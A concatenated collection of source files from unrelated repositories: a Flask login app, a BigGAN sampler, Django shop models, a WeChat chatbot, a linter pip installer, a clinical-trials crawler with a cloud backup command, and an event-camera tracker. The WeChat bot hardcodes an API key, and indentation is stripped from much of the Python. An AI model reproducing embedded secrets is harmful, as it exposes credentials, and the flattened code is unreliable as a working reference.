    already_logged_in = check_if_logged_in()
    if already_logged_in:
        return already_logged_in
form = LoginForm(request.form)
if form.validate_on_submit():
username = form.username.data
password = form.password.data
user = crud.login_check(username, password)
#if user is returned then success!
if user is None:
flash('Invalid username or password', 'flash')
return redirect('/login')
login_user(user)
return redirect('/')
return render_template("login.html", form=form)
@app.route('/register', methods=['POST', 'GET'])
def register_user():
"""Create a new user."""
    already_logged_in = check_if_logged_in()
    if already_logged_in:
        return already_logged_in
form = RegisterForm(request.form)
if form.validate_on_submit():
        username = form.username.data
        password = form.password.data
        crud.create_user(username, password)
return redirect("/login")
return render_template("register.html", form=form)
@app.route('/edit_profile', methods=["GET", "POST"])
@login_required
def change_password():
"""Change Password by checking if hashed passwords matches and return errors or sucess message """
form = UserprofileForm()
if form.validate_on_submit():
username = current_user.username
user = crud.login_check(username, form.password.data)
#Checking if the current password is right
if user:
user.set_password(form.new_password.data)
db.session.commit()
flash("New Password Saved!")
else:
flash("Wrong credentials")
elif request.method == "GET":
#Return back the username into the form
form.username.data = current_user.username
return render_template("profile.html", form = form)
@app.route('/logout')
def logout():
"""Log out using flask login lib"""
crud.login_track(current_user.username)
logout_user()
return redirect("/")
@app.route('/analyze')
def analyze_page():
"""This page will render different information for current users vs new users"""
form = WordsForm()
if current_user.is_authenticated:
latest_messages = NLP.query.options(db.joinedload(NLP.chat)).filter_by(userID=current_user.id).order_by(NLP.chatID.desc()).limit(5)
earliest_messages = NLP.query.options(db.joinedload(NLP.chat)).filter_by(userID=current_user.id).order_by(NLP.chatID).limit(5)
#list of messages selected from DB
return render_template("analyze.html", latest_messages=latest_messages, earliest_messages=earliest_messages, form=form)
else:
all_latest_messages = NLP.query.options(db.joinedload(NLP.chat),db.joinedload(NLP.user)).order_by(NLP.chatID.desc()).limit(5)
all_earliest_messages = NLP.query.options(db.joinedload(NLP.chat),db.joinedload(NLP.user)).order_by(NLP.chatID).limit(5)
return render_template("analyze.html", latest_messages=all_latest_messages , earliest_messages=all_earliest_messages, form=form)
##### AJAX CALL HANDLER from Sentiment Analysis form ######
@app.route('/getPolarity', methods=["POST"])
def sentiment_form():
"""From the AJAX request from chatty.js, return var answer as a dictionary with the results
"""
form = WordsForm()
quest = form.data.get('analysis')
text = form.data.get('text')
if form.validate_on_submit():
print('Someone is trying the analyzer!')
result = crud.print_polarity_from_input(quest,text)
#if the chosen analysis is "PAT", result would comback as a float else would come out Sentiment class from Naive
if not isinstance(result, float):
# ex)Sentiment(classification='pos', p_pos=0.5702702702702702, p_neg=0.4297297297297299)
answer = crud.break_down_naive(result)
return jsonify(answer)
else:
answer = crud.print_pos_neg(result)
return jsonify({'class':answer, 'polarity':result})
return jsonify(data=form.errors)
connect_to_db(app)
db.create_all()
if __name__ == '__main__':
db.create_all()
socketio.run(app, host='0.0.0.0')
#To get into debug mode locally
# socketio.run(app, host='0.0.0.0', debug=True)
```
|
{
"source": "jeehyun100/biggan_torch",
"score": 2
}
|
#### File: jeehyun100/biggan_torch/sample_generator_img.py
```python
import functools
import math
import numpy as np
from tqdm import tqdm, trange
import torch
import torch.nn as nn
from torch.nn import init
import torch.optim as optim
import torch.nn.functional as F
from torch.nn import Parameter as P
import torchvision
# Import my stuff
import inception_utils
import utils
import losses
def run(config):
# Prepare state dict, which holds things like epoch # and itr #
state_dict = {'itr': 0, 'epoch': 0, 'save_num': 0, 'save_best_num': 0,
'best_IS': 0, 'best_FID': 999999, 'config': config}
# Optionally, get the configuration from the state dict. This allows for
# recovery of the config provided only a state dict and experiment name,
# and can be convenient for writing less verbose sample shell scripts.
if config['config_from_name']:
utils.load_weights(None, None, state_dict, config['weights_root'],
config['experiment_name'], config['load_weights'], None,
strict=False, load_optim=False)
# Ignore items which we might want to overwrite from the command line
for item in state_dict['config']:
if item not in ['z_var', 'base_root', 'batch_size', 'G_batch_size', 'use_ema', 'G_eval_mode']:
config[item] = state_dict['config'][item]
# update config (see train.py for explanation)
config['resolution'] = utils.imsize_dict[config['dataset']]
config['n_classes'] = utils.nclass_dict[config['dataset']]
config['G_activation'] = utils.activation_dict[config['G_nl']]
config['D_activation'] = utils.activation_dict[config['D_nl']]
config = utils.update_config_roots(config)
config['skip_init'] = True
config['no_optim'] = True
device = 'cuda'
# Seed RNG
utils.seed_rng(config['seed'])
# Setup cudnn.benchmark for free speed
torch.backends.cudnn.benchmark = True
# Import the model--this line allows us to dynamically select different files.
model = __import__(config['model'])
experiment_name = (config['experiment_name'] if config['experiment_name']
else utils.name_from_config(config))
print('Experiment name is %s' % experiment_name)
G = model.Generator(**config).cuda()
utils.count_parameters(G)
# Load weights
print('Loading weights...')
state_dict = None
# Here is where we deal with the ema--load ema weights or load normal weights
utils.load_weights(G if not (config['use_ema']) else None, None, state_dict,
config['weights_root'], experiment_name, config['load_weights'],
G if config['ema'] and config['use_ema'] else None,
strict=False, load_optim=False)
# Update batch size setting used for G
G_batch_size = max(config['G_batch_size'], config['batch_size'])
z_, y_ = utils.prepare_z_y(G_batch_size, G.dim_z, config['n_classes'],
device=device, fp16=config['G_fp16'],
z_var=config['z_var'])
if config['G_eval_mode']:
print('Putting G in eval mode..')
G.eval()
else:
print('G is in %s mode...' % ('training' if G.training else 'eval'))
#Sample function
sample = functools.partial(utils.sample, G=G, z_=z_, y_=y_, config=config)
if config['accumulate_stats']:
print('Accumulating standing stats across %d accumulations...' % config['num_standing_accumulations'])
utils.accumulate_standing_stats(G, z_, y_, config['n_classes'],
config['num_standing_accumulations'])
# Sample a number of images and save them to an NPZ, for use with TF-Inception
if config['sample_npz']:
# Lists to hold images and labels for images
x, y = [], []
print('Sampling %d images and saving them to npz...' % config['sample_num_npz'])
for i in trange(int(np.ceil(config['sample_num_npz'] / float(G_batch_size)))):
with torch.no_grad():
images, labels = sample()
x += [np.uint8(255 * (images.cpu().numpy() + 1) / 2.)]
y += [labels.cpu().numpy()]
x = np.concatenate(x, 0)[:config['sample_num_npz']]
y = np.concatenate(y, 0)[:config['sample_num_npz']]
print('Images shape: %s, Labels shape: %s' % (x.shape, y.shape))
npz_filename = '%s/%s/samples.npz' % (config['samples_root'], experiment_name)
print('Saving npz to %s...' % npz_filename)
np.savez(npz_filename, **{'x' : x, 'y' : y})
# Prepare sample sheets
if config['sample_sheets']:
print('Preparing conditional sample sheets...')
utils.sample_sheet(G, classes_per_sheet=utils.classes_per_sheet_dict[config['dataset']],
num_classes=config['n_classes'],
samples_per_class=10, parallel=config['parallel'],
samples_root=config['samples_root'],
experiment_name=experiment_name,
folder_number=config['sample_sheet_folder_num'],
z_=z_,)
# Sample interp sheets
if config['sample_interps']:
print('Preparing interp sheets...')
for fix_z, fix_y in zip([False, False, True], [False, True, False]):
utils.interp_sheet(G, num_per_sheet=16, num_midpoints=8,
num_classes=config['n_classes'],
parallel=config['parallel'],
samples_root=config['samples_root'],
experiment_name=experiment_name,
folder_number=config['sample_sheet_folder_num'],
sheet_number=0,
fix_z=fix_z, fix_y=fix_y, device='cuda')
# Sample random sheet
if config['sample_random']:
print('Preparing random sample sheet...')
images, labels = sample()
torchvision.utils.save_image(images.float(),
'%s/%s/random_samples.jpg' % (config['samples_root'], experiment_name),
nrow=int(G_batch_size**0.5),
normalize=True)
# Get Inception Score and FID
get_inception_metrics = inception_utils.prepare_inception_metrics(config['dataset'], config['parallel'], config['no_fid'])
# Prepare a simple function get metrics that we use for trunc curves
def get_metrics():
sample = functools.partial(utils.sample, G=G, z_=z_, y_=y_, config=config)
IS_mean, IS_std, FID = get_inception_metrics(sample, config['num_inception_images'], num_splits=10, prints=False)
# Prepare output string
outstring = 'Using %s weights ' % ('ema' if config['use_ema'] else 'non-ema')
outstring += 'in %s mode, ' % ('eval' if config['G_eval_mode'] else 'training')
outstring += 'with noise variance %3.3f, ' % z_.var
outstring += 'over %d images, ' % config['num_inception_images']
if config['accumulate_stats'] or not config['G_eval_mode']:
outstring += 'with batch size %d, ' % G_batch_size
if config['accumulate_stats']:
outstring += 'using %d standing stat accumulations, ' % config['num_standing_accumulations']
outstring += 'Itr %d: PYTORCH UNOFFICIAL Inception Score is %3.3f +/- %3.3f, PYTORCH UNOFFICIAL FID is %5.4f' % (state_dict['itr'], IS_mean, IS_std, FID)
print(outstring)
if config['sample_inception_metrics']:
print('Calculating Inception metrics...')
get_metrics()
# Sample truncation curve stuff. This is basically the same as the inception metrics code
if config['sample_trunc_curves']:
start, step, end = [float(item) for item in config['sample_trunc_curves'].split('_')]
print('Getting truncation values for variance in range (%3.3f:%3.3f:%3.3f)...' % (start, step, end))
for var in np.arange(start, end + step, step):
z_.var = var
# Optionally comment this out if you want to run with standing stats
# accumulated at one z variance setting
if config['accumulate_stats']:
utils.accumulate_standing_stats(G, z_, y_, config['n_classes'],
config['num_standing_accumulations'])
get_metrics()
def main():
# parse command line and run
parser = utils.prepare_parser()
parser = utils.add_sample_parser(parser)
config = vars(parser.parse_args())
print(config)
run(config)
if __name__ == '__main__':
main()
```
|
{
"source": "JeeHyungPark/Django-shoppingmall",
"score": 2
}
|
#### File: Django-shoppingmall/shop/models.py
```python
from django.db import models
from django.urls import reverse
class Category(models.Model): # product category model
    name = models.CharField(max_length=200, db_index=True) # index the category name in the DB
    meta_description = models.TextField(blank=True)
    slug = models.SlugField(max_length=200, db_index=True, unique=True, allow_unicode=True)
    # slug => build the URL from the product name instead of a numeric post id
class Meta:
ordering = ['name']
verbose_name = 'category'
verbose_name_plural = 'categories'
def __str__(self):
return self.name
    def get_absolute_url(self): # return the default URL for this object after create/update
        return reverse('shop:product_in_category', args=[self.slug])
        # reverse => resolves the URL pattern named product_in_category in the shop app
        # args => passes the values needed to build the URL (here the slug) as a list
class Product(models.Model): # product model
    category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, related_name='products')
    # ForeignKey relates this model to Category; on_delete=SET_NULL keeps products even when their category is deleted
name = models.CharField(max_length=200, db_index=True)
slug = models.SlugField(max_length=200, db_index=True, unique=True, allow_unicode=True)
    image = models.ImageField(upload_to='../products/%Y/%m/%d', blank=True) # image allows blank, so why does the main page error when no photo is added?
description = models.TextField(blank=True)
meta_description = models.TextField(blank=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
stock = models.PositiveIntegerField()
available_display = models.BooleanField('Display', default=True)
available_order = models.BooleanField('Order', default=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ['-created']
        index_together = [['id','slug']] # multi-column index: index the id and slug fields together
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shop:product_detail', args=[self.id, self.slug])
```
|
{
"source": "jeeinn/wechat-web-robot",
"score": 3
}
|
#### File: jeeinn/wechat-web-robot/bot_v0.0.2.py
```python
import requests
import json, re
import itchat
from itchat.content import *
'''
Version 0.0.2
Features:
2. Smart auto-replies in private chats
1. Match the group-chat keyword 说 ("say"), then echo back the received message
'''
KEY = '8edce3ce905a4c1dbb965e6b35c3834d'
# Tuling chatbot API
def get_tuling_res(msg):
    # Build the payload to send to the server
apiUrl = 'http://www.tuling123.com/openapi/api'
data = {
'key' : KEY,
'info' : msg,
'userid' : 'wechat-robot',
}
try:
r = requests.post(apiUrl, data=data).json()
        # dict.get returns None instead of raising when the 'text' key is missing
return r.get('text')
    # Catch unresponsive-server errors with try/except so the program keeps running
except:
return u'我不和你私聊!'
# Smart private-chat replies
@itchat.msg_register(itchat.content.TEXT)
def tuling_reply(msg):
defaultReply = u'我不和你私聊!'
reply = get_tuling_res(msg['Text'])
nick_name = msg['FromUserName']
user_info = itchat.search_friends(userName=nick_name)
if user_info:
nick_name = user_info[u'NickName']
print('%s:%s'%(nick_name,msg['Text']))
return reply or defaultReply
# Group chat monitoring
@itchat.msg_register(TEXT, isGroupChat = True)
def groupchat_reply(msg):
room_name = itchat.search_chatrooms(userName=msg[u'FromUserName'])
print(u"来自-%s-群聊消息|%s:%s"%(room_name[ u'NickName'],msg['ActualNickName'],msg['Text']))
    # Match the leading 说 keyword and echo back the rest of the message
    if re.match(u'^说', msg['Text']):
        itchat.send_msg(re.sub(u'^说', '', msg['Text']), msg[u'FromUserName'])
itchat.auto_login(hotReload=True,enableCmdQR=True)
itchat.run(debug=True)
```
|
{
"source": "jeejakp12/pytorch",
"score": 2
}
|
#### File: linter/adapters/pip_init.py
```python
import os
import argparse
import logging
import subprocess
import sys
import time
from typing import List
def run_command(args: List[str]) -> "subprocess.CompletedProcess[bytes]":
logging.debug("$ %s", " ".join(args))
start_time = time.monotonic()
try:
return subprocess.run(args, check=True)
finally:
end_time = time.monotonic()
logging.debug("took %dms", (end_time - start_time) * 1000)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="pip initializer")
parser.add_argument(
"packages",
nargs="+",
help="pip packages to install",
)
parser.add_argument(
"--verbose",
action="store_true",
help="verbose logging",
)
parser.add_argument(
"--dry-run", help="do not install anything, just print what would be done."
)
args = parser.parse_args()
logging.basicConfig(
format="<%(threadName)s:%(levelname)s> %(message)s",
level=logging.NOTSET if args.verbose else logging.DEBUG,
stream=sys.stderr,
)
for package in args.packages:
package_name, _, version = package.partition("=")
if version == "":
            raise RuntimeError(
                f"Package {package_name} did not have a version specified. "
                "Please specify a version to produce a consistent linting experience."
            )
pip_args = ["pip3", "install"]
# If we are in a global install, use `--user` to install so that you do not
# need root access in order to initialize linters.
#
# However, `pip install --user` interacts poorly with virtualenvs (see:
# https://bit.ly/3vD4kvl) and conda (see: https://bit.ly/3KG7ZfU). So in
# these cases perform a regular installation.
in_conda = os.environ.get("CONDA_PREFIX") is not None
in_virtualenv = os.environ.get("VIRTUAL_ENV") is not None
if not in_conda and not in_virtualenv:
pip_args.append("--user")
pip_args.extend(args.packages)
dry_run = args.dry_run == "1"
if dry_run:
print(f"Would have run: {pip_args}")
sys.exit(0)
run_command(pip_args)
```
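A hedged sketch of a dry-run invocation (the script path and the package pin are illustrative). Note that `str.partition("=")` splits on the first `=` only, so the usual pip `==` pin still yields a non-empty version string and passes the check above:
```python
import subprocess

# Prints the pip command instead of installing, because --dry-run is "1".
subprocess.run(
    ["python3", "pip_init.py", "--dry-run", "1", "flake8==6.0.0"],
    check=True,
)
```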
|
{
"source": "jeekim/euctr-tracker-code",
"score": 2
}
|
#### File: crawl/base/fields.py
```python
import sqlalchemy as sa
from scrapy import Field
from six import add_metaclass
from abc import ABCMeta, abstractmethod
from sqlalchemy.dialects.postgresql import ARRAY, JSONB
from . import helpers
@add_metaclass(ABCMeta)
class Base(Field):
# Public
def __init__(self, primary_key=False):
self.__primary_key = primary_key
def __repr__(self):
return type(self).__name__
@property
@abstractmethod
def column_type(self):
pass # pragma: no cover
@property
def primary_key(self):
return self.__primary_key
def parse(self, value):
return value
class Text(Base):
# Public
column_type = sa.Text
class Integer(Base):
# Public
column_type = sa.Integer
def parse(self, value):
if value is None:
return None
return int(value)
class Boolean(Base):
# Public
column_type = sa.Boolean
def __init__(self, true_value=None, **params):
super(Boolean, self).__init__(**params)
self.__true_value = true_value
def parse(self, value):
if value is None:
return None
if self.__true_value is not None:
value = (value.lower() == self.__true_value.lower())
return value
class Date(Base):
# Public
column_type = sa.Date
def __init__(self, formats, **params):
super(Date, self).__init__(**params)
if not isinstance(formats, (list, tuple)):
formats = [formats]
self.__formats = formats
def parse(self, value):
if value is None:
return None
        for fmt in self.__formats:
try:
return helpers.parse_date(value, format=fmt)
except ValueError:
pass
msg = "time data '{value}' doesn't match any of the formats: {formats}"
raise ValueError(msg.format(value=value, formats=self.__formats))
class Datetime(Base):
# Public
column_type = sa.DateTime(timezone=True)
def __init__(self, format=None, **params):
super(Datetime, self).__init__(**params)
self.__format = format
def parse(self, value):
if value is None:
return None
if self.__format is not None:
value = helpers.parse_datetime(value, format=self.__format)
return value
class Json(Base):
# Public
column_type = JSONB
class Array(Base):
# Public
def __init__(self, field=None, **params):
super(Array, self).__init__(**params)
if field is None:
field = Text()
self.__field = field
self.__column_type = ARRAY(field.column_type)
@property
def column_type(self):
return self.__column_type
def parse(self, value):
if value is None:
return None
result = []
for item in value:
            result.append(self.__field.parse(item))
return result
```
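A hedged usage sketch of these parsers; the import path is inferred from the file layout above and may differ in the real package:
```python
from base.fields import Boolean, Date  # assumed import path

date_field = Date(formats=['%Y-%m-%d', '%d/%m/%Y'])
date_field.parse('2017-03-01')    # parsed by the first format
date_field.parse('01/03/2017')    # falls through to the second format

flag = Boolean(true_value='yes')
assert flag.parse('YES') is True  # comparison is case-insensitive
assert flag.parse(None) is None   # None passes through unparsed
```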
#### File: crawl/base/record.py
```python
import uuid
import scrapy
import logging
from abc import abstractmethod
from . import config
from . import fields
logger = logging.getLogger(__name__)
# Module API
class Record(scrapy.Item):
# Public
def __repr__(self):
template = '<%s: %s>'
text = template % (self.table.upper(), self.get(self.__primary_key))
return text
@property
@abstractmethod
def table(self):
"""Source name.
"""
pass # pragma: no cover
@classmethod
def create(cls, source, data):
# Init dict
self = cls()
# Get primary_key
self.__primary_key = None
for key, field in self.fields.items():
if field.primary_key:
self.__primary_key = key
break
if self.__primary_key is None:
raise TypeError('Record %s requires primary key' % cls)
if not isinstance(self.fields[self.__primary_key], fields.Text):
raise TypeError('Record %s requires text primary key' % cls)
# Get column types
self.__column_types = {}
for key, field in self.fields.items():
self.__column_types[key] = field.column_type
# Check for existence of fields not defined in our schema
undefined = []
for key, value in data.items():
field = self.fields.get(key)
if field is None:
undefined.append(key)
continue
for key in undefined:
logger.warning('Undefined field: %s - %s' % (self, key))
# Set values for everything that is in our schema
for key, value in self.fields.items():
if not key.startswith('meta_'):
d = value.parse(data.get(key, None))
self[key] = d
# Add metadata
ident = uuid.uuid1().hex
self.fields['meta_id'] = fields.Text()
self.fields['meta_source'] = fields.Text()
self.fields['meta_created'] = fields.Datetime()
self.fields['meta_updated'] = fields.Datetime()
self['meta_id'] = ident
self['meta_source'] = source
return self
def write(self, conf, conn):
"""Write record to warehouse.
Args:
conf (dict): config dictionary
conn (dict): connections dictionary
"""
db = conn['warehouse']
if self.table not in db.tables:
if conf['ENV'] in ['development', 'testing']:
table = db.create_table(
self.table,
primary_id=self.__primary_key,
primary_type=fields.Text.column_type)
# work around a bug whereby the table is not persisted
table.table
table = db[self.table]
action = 'created'
if table.find_one(**{self.__primary_key: self[self.__primary_key]}):
action = 'updated'
del self['meta_id']
ensure_fields = False
if conf['ENV'] in ['development', 'testing']:
ensure_fields = True
table.upsert(self, [self.__primary_key], ensure=ensure_fields, types=self.__column_types)
logger.debug('Record - %s: %s - %s fields', action, self, len(self))
```
#### File: management/commands/raw_trials_to_cloud.py
```python
import datetime
import os
import subprocess
import tempfile
import psycopg2
from django.core.management.base import BaseCommand
def _safe_filename(filename):
"""
Generates a safe filename that is unlikely to collide with existing objects
in Google Cloud Storage.
``filename.ext`` is transformed into ``filename-YYYY-MM-DD-HHMMSS.ext``
"""
now = datetime.datetime.utcnow().strftime("%Y-%m-%d-%H%M%S")
basename, extension = filename.rsplit('.', 1)
return "{0}-{1}.{2}".format(basename, now, extension)
def upload_file(filename_to_upload):
"""
    Uploads a file to a given Cloud Storage bucket via gsutil.
"""
# "crentials" are JSON credentials for a Google Cloud service
# account that has a Storage Object Admin role.
target_filename = _safe_filename("euctr_dump.csv")
subprocess.check_output(
[
"gsutil",
"-o",
"Credentials:gs_service_key_file=/home/seb/euctr-backup-credentials-036e81c59878.json",
"cp",
filename_to_upload,
"gs://ebmdatalab/euctr/{}".format(target_filename),
]
)
class Command(BaseCommand):
    help = ('Fetches trials data from the OpenTrials PostgreSQL database and '
            'uploads a CSV dump to Google Cloud Storage')
def handle(self, *args, **options):
opentrials_db = os.environ['EUCTR_OPENTRIALS_DB']
conn = psycopg2.connect(opentrials_db)
cur = conn.cursor()
query = "COPY euctr TO STDOUT DELIMITER ',' CSV HEADER;"
fname = os.path.join(tempfile.gettempdir(), 'euctr_dump.csv')
# `touch` the file. This is so we can open it in `r+b` mode to
# work around a google-bigquery-python bug
with open(fname, 'a'):
os.utime(fname, None)
with open(fname, 'r+b') as f:
cur.copy_expert(query, f)
upload_file(fname)
```
#### File: frontend/templatetags/bar_chart.py
```python
import django
import math
register = django.template.Library()
def calc_bar(value, *args):
"""Calculate percentage of value out of the maximum
of several values, for making a bar chart."""
top = max(args + (value,))
percent = value / top * 100
return percent
def calc_mid_bar(value1, value2, *args):
"""Calculate percentage of value out of the maximum
of several values, for making a bar chart. Return
the midpoint between the height of the first and second
parameter."""
top = max(args + (value1, value2))
percent = (value1 + value2) / 2 / top * 100
return percent
register.simple_tag(calc_bar)
register.simple_tag(calc_mid_bar)
```
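A worked example of the scaling, assuming the two tags above are in scope; the values are illustrative:
```python
print(calc_bar(30, 60, 90))    # 30 / 90 * 100 = 33.33...
print(calc_bar(90, 30, 60))    # the maximum fills the bar: 100.0
print(calc_mid_bar(30, 90))    # (30 + 90) / 2 / 90 * 100 = 66.66...
```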
#### File: frontend/templatetags/render_nan.py
```python
import django
import math
register = django.template.Library()
def default_if_nan(value, default):
"""Converts numbers which are NaN (not a number) to string"""
if math.isnan(value):
return default
return value
def default_if_invalid(value, default):
"""Converts numbers which are None or NaN (not a number) to string"""
if value is None or (isinstance(value, float) and math.isnan(value)):
return default
return value
def custom_percent(value):
"""Display a number with a percent after it, or a dash if not valid"""
if math.isnan(value):
return "-"
return str(value) + "%"
register.filter('default_if_nan', default_if_nan)
register.filter('default_if_invalid', default_if_invalid)
register.filter('custom_percent', custom_percent)
```
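A worked example of the three filters, assuming the functions above are in scope:
```python
print(default_if_nan(float('nan'), '-'))   # '-'
print(default_if_invalid(None, 'n/a'))     # 'n/a'
print(custom_percent(float('nan')))        # '-'
print(custom_percent(42.0))                # '42.0%'
```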
#### File: euctr/frontend/views.py
```python
import atexit
import signal
from django.shortcuts import render
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import HttpResponse
import selenium.webdriver
from . import models
selenium_driver = None
def quit_selenium():
selenium_driver.service.process.send_signal(signal.SIGTERM)
selenium_driver.quit()
def _capture_screenshot(width, url):
global selenium_driver
if not selenium_driver:
selenium_driver = selenium.webdriver.PhantomJS()
atexit.register(quit_selenium)
selenium_driver.set_window_size(width, 100)
selenium_driver.get(url)
png_binary = selenium_driver.get_screenshot_as_png()
return HttpResponse(png_binary, 'image/png')
#############################################################################
# Index page
def index(request):
context = models.get_headlines()
context['showing_all_sponsors'] = 'all' in request.GET
context['activate_search'] = 'search' in request.GET
if context['activate_search']:
context['showing_all_sponsors'] = True
if context['showing_all_sponsors']:
context['sponsors'] = models.get_all_sponsors()
else:
context['sponsors'] = models.get_major_sponsors()
context['load_js_at_start'] = True
context['social_image'] = request.build_absolute_uri(
reverse("index_screenshot_png")
)
return render(request, "index.html", context=context)
def index_screenshot(request):
context = models.get_headlines().copy()
context['taking_screenshot'] = True
return render(request, "index_screenshot.html", context=context)
def index_screenshot_png(request):
return _capture_screenshot(1024, request.build_absolute_uri(
reverse("index_screenshot"))
)
#############################################################################
# Sponsor page
def sponsor(request, slug):
return _sponsor(request, slug, "sponsor.html", False)
def sponsor_screenshot(request, slug):
return _sponsor(request, slug, "sponsor_screenshot.html", True)
def _sponsor(request, slug, template_name, taking_screenshot):
context = models.get_sponsor(slug).copy()
context['trials'] = models.get_trials(slug)
context['load_js_at_start'] = True
context['taking_screenshot'] = taking_screenshot
if not taking_screenshot:
context['social_image'] = request.build_absolute_uri(
reverse("sponsor_screenshot_png", kwargs={"slug": slug})
)
return render(request, template_name, context=context)
def sponsor_screenshot_png(request, slug):
return _capture_screenshot(1024, request.build_absolute_uri(
reverse("sponsor_screenshot", kwargs={"slug": slug}))
)
#############################################################################
# Static pages
def about(request):
context = models.get_headlines()
context['social_image'] = request.build_absolute_uri(
reverse("index_screenshot_png")
)
return render(request, "about.html", context=context)
def fund(request):
return render(request, "fund.html")
```
|
{
"source": "Jee-King/FENet-",
"score": 2
}
|
#### File: models/stark/stark_s.py
```python
import torch
from torch import nn
from lib.utils.misc import NestedTensor
from .backbone import build_backbone
from .convlstm_qkv import ConvLSTM_qkv
from .counter_guide import Counter_Guide
from .transformer import build_transformer
from .head import build_box_head
from lib.utils.box_ops import box_xyxy_to_cxcywh
class STARKS(nn.Module):
""" This is the base class for Transformer Tracking """
def __init__(self, backbone, qkv, counter_guide, transformer, box_head, num_queries,
aux_loss=False, head_type="CORNER"):
""" Initializes the model.
Parameters:
backbone: torch module of the backbone to be used. See backbone.py
transformer: torch module of the transformer architecture. See transformer.py
num_queries: number of object queries.
aux_loss: True if auxiliary decoding losses (loss at each decoder layer) are to be used.
"""
super().__init__()
self.backbone = backbone
self.qkv = qkv
self.counter_guide = counter_guide
self.transformer = transformer
self.box_head = box_head
self.num_queries = num_queries
hidden_dim = transformer.d_model
self.query_embed = nn.Embedding(num_queries, hidden_dim) # object queries
self.bottleneck = nn.Conv2d(backbone.num_channels, hidden_dim, kernel_size=1) # the bottleneck layer
self.aux_loss = aux_loss
self.head_type = head_type
if head_type == "CORNER":
self.feat_sz_s = int(box_head.feat_sz)
self.feat_len_s = int(box_head.feat_sz ** 2)
def forward(self, img=None, events=None, seq_dict=None, mode="backbone", run_box_head=True, run_cls_head=False):
if mode == "backbone":
return self.forward_backbone(img, events)
elif mode == "transformer":
return self.forward_transformer(seq_dict, run_box_head=run_box_head, run_cls_head=run_cls_head)
else:
raise ValueError
def forward_backbone(self, input: NestedTensor, events):
"""The input type is NestedTensor, which consists of:
- tensor: batched images, of shape [batch_size x 3 x H x W]
- mask: a binary mask of shape [batch_size x H x W], containing 1 on padded pixels
"""
assert isinstance(input, NestedTensor)
# Forward the backbone
output_back, pos = self.backbone(input) # features & masks, position embedding for the search
out_event = self.qkv(events[0], events[1], events[2])
fused_feature = self.counter_guide(output_back[0].tensors, out_event)
output_back[0].tensors = fused_feature
# Adjust the shapes
return self.adjust(output_back, pos)
def forward_transformer(self, seq_dict, run_box_head=True, run_cls_head=False):
if self.aux_loss:
raise ValueError("Deep supervision is not supported.")
# Forward the transformer encoder and decoder
output_embed, enc_mem = self.transformer(seq_dict["feat"], seq_dict["mask"], self.query_embed.weight,
seq_dict["pos"], return_encoder_output=True)
# Forward the corner head
out, outputs_coord = self.forward_box_head(output_embed, enc_mem)
return out, outputs_coord, output_embed
def forward_box_head(self, hs, memory):
"""
hs: output embeddings (1, B, N, C)
memory: encoder embeddings (HW1+HW2, B, C)"""
if self.head_type == "CORNER":
# adjust shape
enc_opt = memory[-self.feat_len_s:].transpose(0, 1) # encoder output for the search region (B, HW, C)
dec_opt = hs.squeeze(0).transpose(1, 2) # (B, C, N)
att = torch.matmul(enc_opt, dec_opt) # (B, HW, N)
opt = (enc_opt.unsqueeze(-1) * att.unsqueeze(-2)).permute((0, 3, 2, 1)).contiguous() # (B, HW, C, N) --> (B, N, C, HW)
bs, Nq, C, HW = opt.size()
opt_feat = opt.view(-1, C, self.feat_sz_s, self.feat_sz_s)
# run the corner head
outputs_coord = box_xyxy_to_cxcywh(self.box_head(opt_feat))
outputs_coord_new = outputs_coord.view(bs, Nq, 4)
out = {'pred_boxes': outputs_coord_new}
return out, outputs_coord_new
elif self.head_type == "MLP":
# Forward the class and box head
outputs_coord = self.box_head(hs).sigmoid()
out = {'pred_boxes': outputs_coord[-1]}
if self.aux_loss:
out['aux_outputs'] = self._set_aux_loss(outputs_coord)
return out, outputs_coord
def adjust(self, output_back: list, pos_embed: list):
"""
"""
src_feat, mask = output_back[-1].decompose()
assert mask is not None
# reduce channel
feat = self.bottleneck(src_feat) # (B, C, H, W)
# adjust shapes
feat_vec = feat.flatten(2).permute(2, 0, 1) # HWxBxC
pos_embed_vec = pos_embed[-1].flatten(2).permute(2, 0, 1) # HWxBxC
mask_vec = mask.flatten(1) # BxHW
return {"feat": feat_vec, "mask": mask_vec, "pos": pos_embed_vec}
@torch.jit.unused
def _set_aux_loss(self, outputs_coord):
# this is a workaround to make torchscript happy, as torchscript
# doesn't support dictionary with non-homogeneous values, such
# as a dict having both a Tensor and a list.
return [{'pred_boxes': b}
for b in outputs_coord[:-1]]
def build_starks(cfg):
backbone = build_backbone(cfg) # backbone and positional encoding are built together
qkv = ConvLSTM_qkv(input_dim=3,
hidden_dim=[32,32],
kernel_size=(3, 3),
num_layers=2,
batch_first=True,
bias=True,
return_all_layers=False)
counter_guide = Counter_Guide()
transformer = build_transformer(cfg)
box_head = build_box_head(cfg)
model = STARKS(
backbone,
qkv,
counter_guide,
transformer,
box_head,
num_queries=cfg.MODEL.NUM_OBJECT_QUERIES,
aux_loss=cfg.TRAIN.DEEP_SUPERVISION,
head_type=cfg.MODEL.HEAD_TYPE
)
return model
```
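The CORNER branch of `forward_box_head` builds its head input from an outer product of encoder and decoder embeddings. A minimal shape walk-through of that algebra, with illustrative sizes (the `feat_sz_s = 20` below is an assumption, not a value from the config):

```python
import torch

B, N, C, HW = 2, 1, 256, 400             # e.g. feat_sz_s = 20 -> HW = 400
enc_opt = torch.randn(B, HW, C)          # encoder output for the search region
dec_opt = torch.randn(B, C, N)           # decoder embeddings, transposed
att = torch.matmul(enc_opt, dec_opt)     # (B, HW, N) attention weights
opt = (enc_opt.unsqueeze(-1) * att.unsqueeze(-2)).permute(0, 3, 2, 1).contiguous()
print(opt.shape)                         # torch.Size([2, 1, 256, 400])
opt_feat = opt.view(-1, C, 20, 20)       # ready for the corner head
```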
#### File: test/evaluation/local.py
```python
from lib.test.evaluation.environment import EnvSettings
def local_env_settings():
settings = EnvSettings()
# Set your local paths here.
settings.davis_dir = ''
settings.got10k_path = ''
settings.got_packed_results_path = ''
settings.got_reports_path = ''
settings.lasot_path = ''
settings.eotb_path = '/home/iccd/data/img_ext/'
settings.network_path = '/home/iccd/data/checkpoints/train/stark_s/baseline/' # Where tracking networks are stored.
settings.nfs_path = ''
settings.otb_path = ''
